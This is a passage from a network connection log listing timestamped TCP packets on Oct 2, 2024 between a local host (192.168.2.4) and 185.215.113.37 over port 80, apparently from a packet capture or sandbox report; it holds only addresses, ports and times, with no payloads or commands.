Oct 2, 2024 18:19:30.101464033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101473093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101473093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101481915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101490021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101521015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101691008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101701021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101710081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101722002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101733923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101736069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101746082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101757050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101759911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101768017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101778030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101788044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101803064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101808071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101833105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101861954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.101980925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.101990938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.102000952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.102010012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.102029085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.102051973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134505033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134582996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134589911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134601116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134613991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134625912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134648085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134661913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134692907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134706020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134716988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134727955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134733915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134758949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134779930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134788990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134792089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134799957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134808064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134835005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134865999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134895086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134907007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134913921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134922028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134943962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134973049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.134979010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134988070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.134998083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135035038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135068893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135081053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135128975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135235071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135253906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135263920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135289907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135298014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135304928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135313034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135322094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135325909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135339022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135343075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135355949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135369062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135380030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135401964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135440111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135442019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135452986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135519028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135529041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135544062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135559082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135567904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135571957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135607004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135633945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135648012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.135677099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.135689974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.191996098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192049980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192054987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192100048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192204952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192255020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192264080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192291021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192301989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192332983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192338943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192382097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192383051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192431927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192456007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192501068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192518950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192533970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192545891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192569971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192574024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192606926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192615032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192656040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192656994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192689896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192734003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192740917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192775965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192794085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192811012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192826033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192848921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192857027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192862034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192878008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192898035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192910910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.192914009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.192949057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193002939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193011045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193032980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193044901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193068981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193078041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193089962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193111897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193124056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193146944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193177938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193192005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193192005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193226099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193243980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193278074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193309069 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193321943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193324089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193356037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193375111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193392992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193425894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193442106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193475008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193487883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193521976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193528891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193581104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193588018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193648100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193655968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193690062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193722963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193731070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193757057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193767071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193789005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193808079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193840027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193861008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193893909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193907022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193928003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193937063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193969965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193978071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.193984032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.193996906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194030046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194031954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194058895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194080114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194082975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194112062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194144964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194155931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194176912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194180012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194195986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194221973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194226027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194235086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194248915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194262981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194264889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194277048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194283962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194304943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194309950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194317102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194345951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194360018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194390059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194394112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194411039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194430113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194438934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194473028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194480896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194487095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194513083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194531918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194533110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194566965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194588900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194613934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194621086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194648981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194659948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194684029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194691896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194730997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194734097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194766998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194785118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194811106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194818020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194849968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194896936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194900990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194947958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.194951057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.194983959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.195003033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.195020914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.195050001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.195070028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461553097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461582899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461597919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461622953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461648941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461657047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461657047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461664915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461680889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461698055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461705923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461755991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461782932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461798906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461816072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461839914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461853981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461879969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.461961985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461977959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.461993933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462009907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462016106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462023973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462025881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462037086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462038994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462053061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462068081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462080002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462089062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462100983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462107897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462135077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462168932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462395906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462410927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462426901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462440014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462454081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462470055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462470055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462480068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462482929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462496996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462502956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462512016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462522030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462527037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462541103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462544918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462563038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462574005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462579012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462594032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462603092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462609053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462624073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462635994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462639093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462655067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462666035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462670088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462681055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462685108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462707996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462749004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.462944031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462963104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462976933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.462990999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463004112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463006020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463020086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463030100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463044882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463052034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463059902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463076115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463077068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463090897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463095903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463105917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463114023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463120937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463135958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463140011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463150978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463160038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463166952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463181973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463185072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463197947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463212013 CEST	80	49737	185.215.113.37	192.168.2.4
